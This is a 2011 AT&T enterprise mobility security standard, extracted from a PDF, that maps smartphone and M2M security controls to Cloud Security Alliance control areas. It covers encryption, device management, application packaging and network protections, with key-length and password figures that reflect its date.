Enterprise Mobility Security Standard (EMSS)

 Enterprise Mobility Security Standard
(EMSS)
by AT&T Chief Security Office, ESPCP
The steady double digit growth of threats to smartphones makes security awareness and
action imperative. Recognizing the seriousness of these threats and the ubiquitous,
business-critical nature of mobile applications used by enterprises today, the AT&T Chief
Security Office (CSO) has prepared this comprehensive document containing a lengthy set
of controls for ensuring security of mobile applications and platforms. Enterprises may
choose to use these security controls as a step by step method for auditing and
strengthening the security of their mobile applications and providers. Alternatively,
enterprises may engage AT&T Consulting to perform a mobility security audit using the
standards in this document.
The aim of the Enterprise Mobility Security Standard (EMSS) is to provide a compelling
suite of mobile security controls that tackle the growing security challenges associated with
the revolution in mobile data utility around smartphones. Within the context of an overall
information security program, organizations need to implement mobile security controls to
provide adequate data and information protection and to ensure that the many applicable
regulatory or compliance concerns are sufficiently addressed in smartphones and associated
ecosystems.
EMSS provides a basis for testing smartphone security controls, as well as any technical
security controls in the environment, that are relied on to protect against threats to
smartphones such as malware payloads. This standard can be used to establish a level of
confidence in smartphone and associated ecosystem security.
The EMSS security controls were aggregated with the following objectives in mind:
•
•
•
Use as a metric - Provide application developers, application purveyors, and those
acquiring applications with a yardstick with which to assess the degree of trust that
can be placed on smartphone applications,
Use as guidance – For the mobile application market that is growing at a breakneck
pace, provide guidance to security solution developers as to what to build into their
products slated for mobile platforms, and
Use during procurement - Provide a basis for specifying application security
verification requirements for mobile platforms in contracts.
P a g e | 1 © 2011 AT&T Intellectual Property. All rights reserved. AT&T and the AT&T logo are trademarks of AT&T Intellectual Property.
EMSS uses a subset of the Control Areas from the Cloud Security Alliance (CSA) Cloud
Controls Matrix (CCM) as an overarching framework with focus on following key assessment
categories:
•
•
•
•
•
Mobile Device Security and Management Controls
Application Controls
Data Controls
Network level Controls and Protections
Machine to Machine (M2M) Security
Use of the Cloud Security Alliance (CSA) Cloud Controls Matrix (CCM), offers the added
benefit of the mobile security controls being aligned with applicable standards (i.e. COBIT,
HIPAA, ISO, NIST and PCI).
The Security Control Specifications contained in this document are attributed to the Cloud
Security Alliance (CSA) Cloud Controls Matrix Version (CCM) 1.1, and are represented with
approval from CSA. Please visit http://www.cloudsecurityalliance.org/cm.html for more
information.
Enterprise Mobility Security Standard (EMSS), Mobile Security Controls with Assessment
Categories mapped to a subset of Control Areas from Cloud Security Alliance (CSA) Cloud
Controls Matrix (CCM)
CSA-CCM
Control Area
& Control ID
Data
Governance Ownership /
Stewardship
DG-01
Facility
Security User Access
FS-02
CSA-CCM Security
Control
Specification
All data shall be
designated with
stewardship with
assigned
responsibilities
defined, documented
and communicated.
Physical access to
information assets
and functions by
users and support
personnel shall be
restricted.
Mapped Mobile Security Controls with Assessment
Categories
Data Controls
1. The designated proprietary information, for which
company employees and authorized contracted
workers have custodian responsibility, must be
protected by them when reading, transferring and/or
storing this information on wireless handheld mobile
devices [smartphones].
2. Smartphone users must complete awareness training
about protecting the company, its data and
information against theft, loss, and/or malicious use
and must executed an acceptable use agreement.
Network Level Controls and Protections
1. Wireless hardware (e.g. APs) connected to the
company’s networks must be company authorized
and located in company controlled space. This does
not include wireless network cards.
2. All Supplier contracts for support services including
access to mobile infrastructure equipment must
include appropriate requirements for security
controls.
P a g e | 2 © 2011 AT&T Intellectual Property. All rights reserved. AT&T and the AT&T logo are trademarks of AT&T Intellectual Property.
Enterprise Mobility Security Standard (EMSS), Mobile Security Controls with Assessment
Categories mapped to a subset of Control Areas from Cloud Security Alliance (CSA) Cloud
Controls Matrix (CCM)
CSA-CCM
Control Area
& Control ID
Facility
Security Asset
Management
FS-08
CSA-CCM Security
Mapped Mobile Security Controls with Assessment
Control
Categories
Specification
A complete inventory Mobile Device Security and Management Controls
of critical assets shall
1. Smartphone Asset Management should include:
be maintained with
a. Centralized registration designating Company
ownership defined
Official Use (COU) or Personal Owned
and documented.
b. Asset reporting
c. Compliance reporting
d. Self-service [re: registration, lock, wipe, password
change, locate, etc.]
3. A Personal owned smartphone must implement two
separately contained processing environments, one
for company business information processing and
storage and one for personal information. This
configuration must ensure separation of business and
personal information on the smartphone.
4. Smartphone software used to process and store
company information must be obtained from
company approved software inventory and /or app
store(s) and the smartphone must be scanned for
malware and unauthorized applications.
5. Jailbroken smartphones must not access company
data.
Network Level Controls and Protections
6. Personal owned smartphones should be scanned for
compliance with company security standards and
configurations before they access the company
network.
Information
Normal and privileged Mobile Device Security and Management Controls
Security user access to
1. The company should authorize use of wireless
User Access applications, systems,
handheld devices based on what equipment and
Restriction / databases, network
services employees are eligible to receive predicated
Authorization configurations, and
on their job role.
sensitive data and
2. Access should only be granted to necessary services
IS-08
functions shall be
based on job role, i.e. EAS [Exchange ActiveSync],
restricted and
PIM [Personal Information Manager] sync, e.g.
approved by
Calendar Contacts, Tasks, Memo…, VPN, etc.
management prior to
access granted.
P a g e | 3 © 2011 AT&T Intellectual Property. All rights reserved. AT&T and the AT&T logo are trademarks of AT&T Intellectual Property.
Enterprise Mobility Security Standard (EMSS), Mobile Security Controls with Assessment
Categories mapped to a subset of Control Areas from Cloud Security Alliance (CSA) Cloud
Controls Matrix (CCM)
CSA-CCM
Control Area
& Control ID
Information
Security –
Encryption
CSA-CCM Security
Mapped Mobile Security Controls with Assessment
Control
Categories
Specification
Policies and
Data Controls
procedures shall be
1. The Encryption used for protection of data at rest and
established and
in transit shall be Industry standard encryption.
mechanisms
IS-18
implemented for
2. Key lengths: Symmetric encryption key lengths must
encrypting sensitive
be at least 112 bits long. 256 bit key length is
data in storage (e.g.,
preferred, unless it impacts the responsiveness of the
file servers,
application. Asymmetric key lengths must be at
databases, and endleast 1024 bits.
user workstations and
3. 1-way hashes of PINs or passwords should include a
mobile devices) and
random 64-bit salt.
data in transmission
4. Content stored on the smartphone should be
(e.g., system
encrypted.
interfaces, over public
5. PIM [Personal Information Manager] sync, and all
networks, and
data transfer should be encrypted.
electronic
messaging).
Information
Policies and
1. A documented operational model must exist for each
Security procedures shall be
application that manages keys. The operational
Encryption
established and
model must include defined roles and responsibilities
Key
mechanisms
for each key management function and a description
Management implemented for
of how key management standards for each function
effective key
are met.
IS-19
management to
2. Encryption keys [classified as proprietary information]
support encryption of
must not be stored, cached or “remembered” in plain
data in storage and in
text, and must not be hard coded in the application.
transmission.
[Consider using Key stores provided by the operating
system.] If stored on removable media, such as a
USB drive or memory card the user must take
precautions to physically secure the media.
3. The decryption key should be stored on the system
and the messaging server residing at the Company's
facilities.
4. Encryption keys should be unique for each handset
instance.
5. Encryption keys, and salt and nonce values, should be
generated securely, as random numbers. [e.g. use of
SecureRandom or Microsoft CryptoAPI.]
6. Encryption keys should be coded into mutable
primitive arrays, not immutable objects. The arrays
should be zeroed out before freeing for garbage
collection.
P a g e | 4 © 2011 AT&T Intellectual Property. All rights reserved. AT&T and the AT&T logo are trademarks of AT&T Intellectual Property.
Enterprise Mobility Security Standard (EMSS), Mobile Security Controls with Assessment
Categories mapped to a subset of Control Areas from Cloud Security Alliance (CSA) Cloud
Controls Matrix (CCM)
CSA-CCM
Control Area
& Control ID
Information
Security Anti-Virus /
Malicious
Software
IS-21
Information
Security Portable /
Mobile
Devices
IS-32
CSA-CCM Security
Mapped Mobile Security Controls with Assessment
Control
Categories
Specification
Mobile Device Security and Management Controls
Ensure that all
1. The Mobile ecosystem [Device, Network and Cloud]
antivirus programs
must include the capability [e.g. a gateway] to detect
are capable of
malware, and prevent it from installing itself in the
detecting, removing,
end-to-end Mobile Service that includes cloud
and protecting
computing networked to endpoints or smartphones.
against all known
2. In house and 3rd party developed applications should
types of malicious or
be digitally signed. When these applications are
unauthorized software
downloaded, this code signing mechanism should be
with antivirus
used to confirm the integrity of the application, and
signature updates at
its mobile code as well as prevent malware from
least every 12 hours.
installing itself on a smartphone. This control is
focused on user applications not preloaded factory
software provided by the smartphone manufacturer.
3. Monitoring or scanning software should be capable of
identifying and quarantining an infected smartphone,
or wiping the company managed smartphone
returning it to factory build state, or wiping it with
poison pill encryption where the “poison pill” is
reversible, i.e. when returned the IT department can
restart the device and decrypt its storage with a
special password.
Policies and
Mobile Device Security and Management Controls
procedures shall be
1. Mobile Computing: Access Control for Wireless
established and
Handheld Computing Systems or smartphones
measures
a. An appropriate account management team must
implemented to
provision the wireless handheld computing device or
strictly limit access
smartphone account on the push wireless
to sensitive data
email/wireless mobile message server, e.g.
from portable and
BlackBerry Enterprise Server (BES), Good Mobile
mobile devices,
Messaging (GMM) or Microsoft Exchange ActiveSync
such as laptops, cell
(MS EAS). [Where the wireless mobile message
phones, and personal
server acts as a proxy to the user's email box via the
digital assistants
permission granted through a service account on the
(PDAs), which are
wireless mobile message server.]
generally higher-risk
2. The Wireless handheld computing system or
than non-portable
smartphone :
devices (e.g., desktop
a. Must enforce passwords on all the devices that are
computers at the
part of Wireless Messaging Architecture.
organization’s
b. Must not allow Users the ability to disable the
facilities).
password on the device or smartphone.
c. Must implement a password of at least 6 characters in
length. Password complexity is recommended.
P a g e | 5 © 2011 AT&T Intellectual Property. All rights reserved. AT&T and the AT&T logo are trademarks of AT&T Intellectual Property.
Enterprise Mobility Security Standard (EMSS), Mobile Security Controls with Assessment
Categories mapped to a subset of Control Areas from Cloud Security Alliance (CSA) Cloud
Controls Matrix (CCM)
CSA-CCM
Control Area
& Control ID
CSA-CCM Security
Control
Specification
Mapped Mobile Security Controls with Assessment
Categories
d. Should have a timeout interval [e.g. max of 15
minutes] for the smartphone to lock.
e. Should have a setting interval [e.g.‘no higher than
180’ for the number of days] after which the user will
be prompted to change the smartphone password.
f. Must provide System Administrators with over-the-air
capability to delete the user, apply additional policies,
and wipe data with verification of wipe, as necessary.
3. Wireless handheld computing system or
smartphone management ecosystem:
a. Must include applying the password policies over-theair to the devices.
4. Wireless handheld computing system or
smartphone data:
a. Must be automatically wiped after a specified number
of attempts [e.g. no higher than 7 attempts, as
maximum number of attempts] and must confirm the
over-the-air wipe.
b. Must be wiped when the smartphone is going out of
service or being reassigned.
c. Smartphones should be integrated with backup and
recovery services, [e.g. some smartphone platforms
include ‘cloud’ backup storage].
5. In conjunction with the Company’s Compliance
Program, internal ‘push wireless email’ infrastructure
servers must be hardened according to standard
security practices including maintaining current
patches, removal of default passwords, periodic
scanning and remediation of security vulnerabilities,
along with periodic review of access privileges.
6. External ‘push wireless email’ servers must be harden
according to standard security practices including
sustaining current patches, removal of default
passwords, periodic scanning and remediation of
security vulnerabilities, along with periodic review of
access privileges consistent with the security
requirements contained in the contract between the
company and the 3rd party supplier.
7. Company Restricted and Sensitive Personal
proprietary information must not be copied from
P a g e | 6 © 2011 AT&T Intellectual Property. All rights reserved. AT&T and the AT&T logo are trademarks of AT&T Intellectual Property.
Enterprise Mobility Security Standard (EMSS), Mobile Security Controls with Assessment
Categories mapped to a subset of Control Areas from Cloud Security Alliance (CSA) Cloud
Controls Matrix (CCM)
CSA-CCM
Control Area
& Control ID
CSA-CCM Security
Control
Specification
Mapped Mobile Security Controls with Assessment
Categories
primary sources and stored on smartphone removable
or portable media (such as USB flash drives, memory
sticks, or card) unless there is a business need and
written approval is obtained (and retained) from a
Company Executive with appropriate delegation of
authority and, it is stored and/or transmitted
encrypted, except where:
(a) the media remains in a Company’s controlled space
as part of a documented business process,
(b) individual customer information is shipped to a
customer on electronic media,
(c) there is a business need to transfer data between
Company locations or storage of backups from official
company data centers.
(d) the approved Smartphone removable or portable
media [e.g. memory card] containing proprietary
information:
- Must either be kept in the direct supervision of the
custodian or physically secured from unauthorized
access (e.g. in a locked office, desk, or filing cabinet),
and
- Must not leave the direct supervision of the custodian
when traveling on public transport (e.g. must not be
placed in taxi trunk/boot, bus hold/baggage storage,
checked-in on an airplane).
Resiliency Business
Continuity
Planning
RS-03
A consistent unified
framework for
business continuity
planning and plan
development shall be
established,
documented and
adopted to ensure all
business continuity
plans are consistent
in addressing
priorities for testing
and maintenance and
information security
requirements.
Requirements for
1. Business Continuity planning to sustain or
recover end-to-end Mobile service from Cell
Tower radio access network (RAN) to Data
Center or Cloud Computing should include:
(a) a managed process stablished
throughout the organization that
addresses the information security
requirements needed for the
organization’s business continuity.
(b) identification, along with the probability
and impact of events that can cause
interruptions to business and their
consequences for information security.
(c) Development and implementation of
plans to maintain or restore operations
and ensure availability of
P a g e | 7 © 2011 AT&T Intellectual Property. All rights reserved. AT&T and the AT&T logo are trademarks of AT&T Intellectual Property.
Enterprise Mobility Security Standard (EMSS), Mobile Security Controls with Assessment
Categories mapped to a subset of Control Areas from Cloud Security Alliance (CSA) Cloud
Controls Matrix (CCM)
CSA-CCM
Control Area
& Control ID
CSA-CCM Security
Mapped Mobile Security Controls with Assessment
Control
Categories
Specification
business continuity
information, applications and
plans include the
equipment at the required level and in
following:
the required time scales following
• Defined purpose
interruption to, or failure of, critical
and scope, aligned
business processes.
with relevant
(d) a single framework for business
dependencies
continuity plans to ensure that all plans
• Accessible to and
are consistent, re: addressing
understood by those
information security requirements, and
who will use them
establishing priorities for testing and
• Owned by a named
maintenance.
person(s) who is
responsible for their
review, update and
approval
• Defined lines of
communication, roles
and responsibilities
• Detailed recovery
procedures, manual
work-around and
reference information
• Method for plan
invocation
Resiliency Business
Continuity
Testing
Business continuity
plans shall be subject
1. Business continuity plans should be tested and
to test at planned
updated regularly to ensure that they are
intervals or upon
current and effective.
significant
RS-04
organizational or
environmental
changes to ensure
continuing
Security
Policies and
Data Controls
Architecture - procedures shall be
1. Application Data Integrity for Wireless Handheld
Data Security established and
Mobile System or Smartphone
/ Integrity
mechanisms
a. Based on data sensitivity, application data on a
implemented to
smartphone must be stored in local protected and/or
SA-03
ensure security (e.g.,
encrypted storage, local key store, local file system,
encryption, access
local nonvolatile memory, and/or local database et al
controls, and leakage
and must be encrypted using industry standard
prevention) and
encryption algorithms.
P a g e | 8 © 2011 AT&T Intellectual Property. All rights reserved. AT&T and the AT&T logo are trademarks of AT&T Intellectual Property.
Enterprise Mobility Security Standard (EMSS), Mobile Security Controls with Assessment
Categories mapped to a subset of Control Areas from Cloud Security Alliance (CSA) Cloud
Controls Matrix (CCM)
CSA-CCM
Control Area
& Control ID
CSA-CCM Security
Mapped Mobile Security Controls with Assessment
Control
Categories
Specification
integrity of data
b. A mobile application's private data must be protected
exchanged between
against unauthorized access.
one or more system
c. Passwords, private keys, and other confidential
interfaces,
information must be stored in protected storage on
jurisdictions, or with a
the smartphone and encrypted. The password used to
third party shared
gain access to the protected information must not be
services provider to
stored on the smartphone.
prevent improper
d. Application settings and provisioning data must only
disclosure, alteration
be accessible to the application and smartphone
or destruction
management components.
complying with
e. Access, including read, write and update, of a
legislative,
smartphone PIM [Personal Information Manager] local
regulatory, and
address book, inbox, calendar, memo pad and other
contractual
"storage" oriented applications should be subject to
requirements.
user control.
f. Access to smartphone run time information, including
but not limited to smartphone location information,
subscriber MSISDN [Mobile Subscriber Integrated
Services Digital Network Number], subscriber IMSI
[International Mobile Subscriber Identity], device
IMEI [International Mobile Equipment Identity], GPS
[Global Positioning System] or location based data,
etc, are subject to user control.
g. Over-the-air wipe of smartphone or application data
[i.e. returning it to factory build state] on a lost or
stolen smartphone based on application level
identification, subscriber MSISDN, and/or device IMEI
must be supported and must be executed “silently”
and be made uninterruptible by user interaction.
h. Sandboxing: Application settings and provisioning
data must only be accessible to the application and its
corresponding smartphone management components.
The data must be protected against access by other
mobile applications. When shared with other
applications, the data must continue to be
inaccessible to unauthorized applications. Data that
is private to a specific user or user session must only
be accessible to that specific user or session.
P a g e | 9 © 2011 AT&T Intellectual Property. All rights reserved. AT&T and the AT&T logo are trademarks of AT&T Intellectual Property.
Enterprise Mobility Security Standard (EMSS), Mobile Security Controls with Assessment
Categories mapped to a subset of Control Areas from Cloud Security Alliance (CSA) Cloud
Controls Matrix (CCM)
CSA-CCM
Control Area
& Control ID
Security
Architecture Application
Security
SA-04
CSA-CCM Security
Control
Specification
Applications shall be
designed in
accordance with
industry accepted
security standards
(i.e., OWASP for web
applications) and
complies with
applicable regulatory
and business
requirements.
Mapped Mobile Security Controls with Assessment
Categories
Application Controls
1. Applications must not contain “back-door” code that
allows privileged access that bypasses the
identification and authentication processes.
2. Encryption keys and passwords should be coded into
mutable primitive arrays, not immutable objects. The
arrays should be zeroed out before freeing for
garbage collection e.g., Java coders should use
character arrays, not String objects to store sensitive
data. And those arrays should be zeroed out in finally
clauses, prior to garbage collection. [This will reduce
the chance of an attack on the memory of the device
revealing sensitive information].
3. Authorization logic must be carefully designed to
prevent escalation of privilege attacks. All
architecture patterns (especially web solutions)
should apply access-control filters to provide fail-safe
access controls.
4. Application Packaging Security
a. Only the company authorized release version of the
mobile software should be used in production.
b. The release version of the smartphone software
should be code signed by the company, or company
approved provisioning entity, such as Apple iTunes,
where applicable.
c. Mobile software developed using interpreter based
languages, e.g. J2ME, .NET, should be obfuscated to
prevent hackers from leveraging the implementation
logic and finding ways to attack through reverse
engineering.
d. Privilege manifest, i.e. privileges and resources that a
mobile executable requires for normal execution
should be clearly specified in the release package.
e. A mobile application should be able to be hidden, be
minimized, be paused, and be stopped and resumed
to save smartphone power and for the courtesy of
other applications on the smartphone.
5. Company should test all enterprise use mobile
applications, especially if they access company data.
P a g e | 10 © 2011 AT&T Intellectual Property. All rights reserved. AT&T and the AT&T logo are trademarks of AT&T Intellectual Property.
Enterprise Mobility Security Standard (EMSS), Mobile Security Controls with Assessment
Categories mapped to a subset of Control Areas from Cloud Security Alliance (CSA) Cloud
Controls Matrix (CCM)
CSA-CCM
Control Area
& Control ID
Security
Architecture Data
Integrity
SA-05
Security
Architecture Wireless
Security
SA-10
CSA-CCM Security
Mapped Mobile Security Controls with Assessment
Control
Categories
Specification
Data input and output Data Controls
integrity routines
1. Data input must be validated from non approved
(i.e., reconciliation
sources (client applications, interfaces, databases,
and edit checks) shall
configuration, data and property files), for size, type,
be implemented for
quantity, and permitted range of values, before the
application interfaces
data values are used for computations.
and databases to
prevent manual or
systematic processing
errors or corruption of
data.
Policies and
Network Level Controls and Protections
procedures shall be
1. Mobile Computing: Connectivity
established and
a. The connection(s) between company
mechanisms
systems/smartphones and any vendor systems must
implemented to
go through a company firewall/security gateway and
protect wireless
must use a secure connection Secure Socket Layer
network
[SSL].
environments,
b. End-to-end VPN access through a Virtual Private
including the
Gateway (VPG) should be used for data protection
following:
when connecting a VPN enabled smartphone to a
• Perimeter firewalls
cloud based application.
implemented and
c. HTTPS should be used between mobile applications
configured to restrict
and web servers to protect the data stream,
unauthorized traffic
regardless of whether the data flows over the 3G
• Security settings
network, transits the Internet, or utilizes WiFi
enabled with strong
connectivity where warranted by data sensitivity.
encryption for
Application Control
authentication and
1. Application Transport Security
transmission,
The available ‘network’ transport type can be WLAN,
replacing vendor
GSM/GPRS/EDGE/UMTS, Wi-Fi, WiMax, Bluetooth,
default settings (e.g.,
Infrared, USB, etc. Each transport may be capable of
encryption keys,
voice, data and/or signaling transmission. Further
passwords, SNMP
each transport may implement one or more
community strings,
transport-level [protocol] stacks, e.g. TCP/IP, SMS,
etc.).
IMS, WAP, etc.
• Logical and
The requirements for transport security in the
context of mobile applications are:
physical user access
a. Explicit user confirmation is required before binding
to wireless network
and connecting to mobile system network transport to
devices restricted to
exchange data with external peer applications.
authorized personnel
P a g e | 11 © 2011 AT&T Intellectual Property. All rights reserved. AT&T and the AT&T logo are trademarks of AT&T Intellectual Property.
Enterprise Mobility Security Standard (EMSS), Mobile Security Controls with Assessment
Categories mapped to a subset of Control Areas from Cloud Security Alliance (CSA) Cloud
Controls Matrix (CCM)
CSA-CCM
Control Area
& Control ID
CSA-CCM Security
Mapped Mobile Security Controls with Assessment
Control
Categories
Specification
• The capability to
b. The application must use only those transports
detect the presence
authorized for the application to bind and connect to
of unauthorized
external applications, devices or systems. .
(rogue) wireless
c. The connecting peer must be authenticated at the
network devices for a
transport level before accepting connections.
timely disconnect
Methods may include Bluetooth authentication, WiFi
from the network.
authentication, verifying SSL server certificates,
verifying IP address range, or using IPSec.
d. A mobile application must not act as a “relay” to
inter-connect the Company Intranet with the public
cellular network, local area network, or personal area
network, unless that functionality is specifically
identified as a requirement.
e. To reduce risk of Denial of Service (DOS) attacks the
following should be implemented: setting timeout
values on receive and idle states, validating packet
size and contents, validating transport parameters
and content, limiting the number of concurrent
connections from a peer, and limiting total concurrent
connections.
f. Secure transport, using TLS for example, must use
industry standard encryption algorithms.
g. Applications that use broadcast transports (SMS,
MMS, IMS) must implement a harassment detection
and prevention mechanism.
2. Application Protocol Security
A protocol is defined when a mobile application needs to
communicate with other applications to exchange
application specific information. The application(s) that
a mobile application interacts with can be local onsmart device applications, or remote applications with
connectivity to the mobile application.
a. The integrity of the protocol must be protected
against man-in-the-middle and denial of service
attacks.
b. Packet level integrity must be provided using
industry standard encryption algorithms.
c. The confidentiality of any proprietary information
must be protected against eavesdropping during
transmission.
d. Since Interaction with on-platform mobile
applications (email, SMS, mobile browser, etc.) can
cause privacy concerns and even fraud, this interaction
P a g e | 12 © 2011 AT&T Intellectual Property. All rights reserved. AT&T and the AT&T logo are trademarks of AT&T Intellectual Property.
Enterprise Mobility Security Standard (EMSS), Mobile Security Controls with Assessment
Categories mapped to a subset of Control Areas from Cloud Security Alliance (CSA) Cloud
Controls Matrix (CCM)
CSA-CCM
Control Area
& Control ID
CSA-CCM Security
Control
Specification
Mapped Mobile Security Controls with Assessment
Categories
must be subject to explicit confirmation control based
on the sensitivity of data. Interaction includes startup,
shutdown, invocation, enable, disable, and exchange of
information with other applications on the mobile
systems.
e. Applicable, mutual authentication of peer applications
must be conducted before actual exchange of data
begins.
3. Application Identification
a. Each user or smart device must be identified
uniquely and an identifier can belong to one and only
one user or device in a mobile application name space.
4. Application Authentication
a. Authentication credentials (Passwords, PINS,
passphrases, password hints) must be encrypted in
storage and in transit, and be masked when displayed.
b. Authentication logic should never need to read a
plaintext credential from storage; logic should always
hash a credential entered by the user, and compare
that value to the hashed stored value.
c. For Digital Certificates:
- There must be a revocation process for certificates
that have been compromised.
- Expired or invalid certificates should not be used.
Owners of certificates must keep their certificates up to
date, and not use out of date certificates.
- All public key infrastructures must be authorized by
the Company.
5. Application Accountability
a. Mobile applications should include audit log
functionality.
Network Level Controls and Protections
1. Bluetooth Security
a. Bluetooth security must protect against the following:
• Sniffing communication to capture authentication
and encryption keys.
• Device pairing initiated by an unauthorized
source.
• Unauthorized access or use of a shared service.
• Use of weak authentication credentials.
• Loss of the integrity and confidentiality of data
being transmitted and stored.
• Loss or theft of a Bluetooth device.
P a g e | 13 © 2011 AT&T Intellectual Property. All rights reserved. AT&T and the AT&T logo are trademarks of AT&T Intellectual Property.
Enterprise Mobility Security Standard (EMSS), Mobile Security Controls with Assessment
Categories mapped to a subset of Control Areas from Cloud Security Alliance (CSA) Cloud
Controls Matrix (CCM)
CSA-CCM
Control Area
& Control ID
CSA-CCM Security
Control
Specification
Mapped Mobile Security Controls with Assessment
Categories
2. Wireless LAN Security
a. Wireless Access Points (WAP )must be company
authorized and WAP infrastructure [e.g. Access Points
(APs), and Dynamic Host Configuration Protocol
(DHCP)] must be hardened according to standard
security practices including maintaining of current
patches, removal of default passwords, periodic
scanning and remediation of security vulnerabilities,
along with periodic review of access privileges.
Security
Architecture Mobile Code
SA-15
Mobile code shall be
Application Controls
authorized before its
1. Common forms of mobile code are JavaScript, Java
installation and use,
applets, ActiveX, and Flash. Each form of mobile
and the configuration
code has a different security model and configuration
shall ensure that the
management process. Web interactions rely on
authorized mobile
mobile code, either running on a Web server or Web
code operates
browser. Web applications and mobile code are
according to a clearly
susceptible to four classes of attacks: browserdefined security
oriented, server-oriented, network-oriented, and
policy. All
user-oriented. Technical Controls that should be
unauthorized mobile
selected, deployed, and maintained as safeguards
code shall be
against these classes of attacks include but are not
prevented from
limited to:
executing.
a. Filters that examine code at points of entry and block
or disable it if deemed harmful.
b. Cages that constrain the code’s behavior (e.g.
privilege or function) during execution.
c. Signatures that prevent code execution unless
digitally signed by an approved source.
d. Proofs that define properties of code and are
conveyed with it, which must be successfully verified
before the code is executed.
2. Application Inventory and Revocation
a. All software: OSs, applications, and tools on company
registered smartphones must be company approved
and 3rd party software must be properly licensed.
b. A company approved inventory of software must
reside in a company managed software ‘store’ that
includes software distribution or download to
company registered smartphones, only.
c. Download of application software to company
registered smartphones using sideload where a USB
cable is tethered between a personal computer (PC)
P a g e | 14 © 2011 AT&T Intellectual Property. All rights reserved. AT&T and the AT&T logo are trademarks of AT&T Intellectual Property.
Enterprise Mobility Security Standard (EMSS), Mobile Security Controls with Assessment
Categories mapped to a subset of Control Areas from Cloud Security Alliance (CSA) Cloud
Controls Matrix (CCM)
CSA-CCM
Control Area
& Control ID
CSA-CCM Security
Control
Specification
Mapped Mobile Security Controls with Assessment
Categories
and a smartphone is allowed, e.g., Apple iOS
applications via iTunes.
d. Software configuration on the company registered
smartphones must be monitored or scanned
regularly. Any software identified as not approved
must trigger one or more of the following actions
depending on the vulnerability level created by the
not approved application or tool:
‐ Smartphone user notification,
‐ Selective wipe of the offending application or tool,
‐ Wipe with poison pill encryption where the “poison
pill” is reversible, i.e., when returned the IT
department can restart the device and decrypt its
storage with a special password.
‐ Administrator remote wipe of the smartphone
returning it to factory build state.
Machine to Machine (M2M) Security
a. M2m Wireless Device:
Wireless should include
‐ UMTS Encryption (UEA1)
‐ 3GPP.org Technical Specification 35.202.
SIM Security should include
‐ IMSI – IMEI tracking and change notification
[where IMSI = International Mobile subscriber
ID/network routing # and IMEI = International
mobile Equip ID/mobile device ID]
‐ SIM PIN locking
‐ Solderable SIMs
b. Application Security should include
‐ End to end VPN
c. Business Continuity should include
‐ Redundant devices and connection paths.
P a g e | 15 © 2011 AT&T Intellectual Property. All rights reserved. AT&T and the AT&T logo are trademarks of AT&T Intellectual Property.
Download PDF